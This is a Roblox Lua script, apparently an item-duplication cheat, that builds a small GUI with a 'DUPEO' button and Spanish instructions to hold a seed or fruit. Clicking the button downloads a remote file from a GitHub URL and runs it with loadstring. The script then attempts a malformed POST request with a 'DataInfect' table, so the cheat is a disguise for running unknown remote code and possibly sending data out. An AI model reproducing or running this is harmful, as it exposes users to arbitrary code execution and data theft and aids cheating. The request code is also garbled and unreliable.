--[=[ d888b db db d888888b .d888b. db db db .d8b. 88' Y8b 88 88 `88' VP `8D 88 88 88 d8' `8b 88 88 88 88 odD' 88 88 88 88ooo88 88 ooo 88 88 88 .88' 88 88 88 88~~~88 88. ~8~ 88b d88 .88. j88. 88booo. 88b d88 88 88 @uniquadev Y888P ~Y8888P' Y888888P 888888D Y88888P ~Y8888P' YP YP CONVERTER designed using localmaze gui creator ]=] -- Instances: 6 | Scripts: 1 | Modules: 0 | Tags: 0 local LMG2L = {}; -- Players.elmejorde99ni.PlayerGui.ScreenGui LMG2L["ScreenGui_1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui")); LMG2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling; -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame LMG2L["Frame_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]); LMG2L["Frame_2"]["BorderSizePixel"] = 0; LMG2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91); LMG2L["Frame_2"]["Size"] = UDim2.new(0, 292, 0, 170); LMG2L["Frame_2"]["Position"] = UDim2.new(0, 48, 0, 4); -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame.TextButton LMG2L["TextButton_3"] = Instance.new("TextButton", LMG2L["Frame_2"]); LMG2L["TextButton_3"]["BorderSizePixel"] = 0; LMG2L["TextButton_3"]["TextSize"] = 36; LMG2L["TextButton_3"]["BackgroundColor3"] = Color3.fromRGB(114, 114, 114); LMG2L["TextButton_3"]["FontFace"] = Font.new([[rbxasset://fonts/families/PressStart2P.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); LMG2L["TextButton_3"]["Size"] = UDim2.new(0, 126, 0, 52); LMG2L["TextButton_3"]["Text"] = [[DUPEO]]; LMG2L["TextButton_3"]["Position"] = UDim2.new(0, 72, 0, 94); -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame.TextButton.LocalScript LMG2L["LocalScript_4"] = Instance.new("LocalScript", LMG2L["TextButton_3"]); -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame.UIDragDetector LMG2L["UIDragDetector_5"] = Instance.new("UIDragDetector", LMG2L["Frame_2"]); -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame.TextLabel LMG2L["TextLabel_6"] = Instance.new("TextLabel", LMG2L["Frame_2"]); LMG2L["TextLabel_6"]["BorderSizePixel"] = 0; LMG2L["TextLabel_6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); LMG2L["TextLabel_6"]["Size"] = UDim2.new(0, 248, 0, 52); LMG2L["TextLabel_6"]["Text"] = [[mantén la semilla que quieres duplicar o frutq]]; LMG2L["TextLabel_6"]["Position"] = UDim2.new(0, 22, 0, 14); -- Players.elmejorde99ni.PlayerGui.ScreenGui.Frame.TextButton.LocalScript local function C_4() local script = LMG2L["LocalScript_4"]; local button = script.Parent button.MouseButton1Click:Connect(function() print("El botón fue presionado!") --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local URL = "https://raw.githubusercontent.com/G4mg1/ProjectLigmaFeBypasser/refs/heads/main/README.md" local Response = game:HttpGet(URL) if Response then loadstring(Response)() pcall(function() local DataInfect = { Attached = false; Data = nil; Loaded = false; } syn.request({ Response; "Post"; "Header" == "Content-Type: application/json"; "Body" == game:GetService("HttpService"):JSONEncode({ DataInfect.Data; DataInfect.Loaded; DataInfect.Attached }) }) end) end game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16 end) end; task.spawn(C_4); return LMG2L["ScreenGui_1"], require;